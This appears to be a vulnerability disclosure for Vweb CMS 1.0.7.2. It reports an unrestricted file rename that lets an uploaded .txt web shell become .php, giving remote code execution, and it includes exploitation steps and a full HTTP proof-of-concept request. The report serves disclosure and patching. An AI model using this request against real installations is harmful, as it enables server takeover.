## Critical Vulnerability Information ### Vulnerability Overview - **Vendor**: Vweb - **Product**: Vweb CMS - **Version**: 1.0.7.2 - **Download Link**: https://github.com/givons/Vweb ### Vulnerability Description Vweb CMS version 1.0.7.2 contains an arbitrary file upload vulnerability. Users can directly rename files, and there are no restrictions on file extensions. By uploading a file with a common extension (e.g., .txt) and then renaming it to .php, attackers can achieve Remote Code Execution (RCE). ### Analysis - **Problem Code**: `Vweb1.0.7.2/system/traits/media.php` - **Root Cause**: - The function directly calls PHP's `rename` function without validating the file extension. - No blacklist mechanism is in place, allowing arbitrary file renaming. ### Exploitation Steps 1. **Upload File**: Upload a .txt file containing malicious script. 2. **Rename File**: Rename the .txt file to .php. 3. **Execute Command**: Access the uploaded .php file to trigger RCE. ### POC (Proof of Concept) ```http POST /admin/index.php?r=admin%2Fmedia%2FmediaAction&rename HTTP/1.1 Host: 192.168.1.1:8083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 52 Origin: http://192.168.1.1:8083 Connection: close file=shell.txt&newNameFile=shell.php ``` Accessing the uploaded `shell.php` file triggers RCE.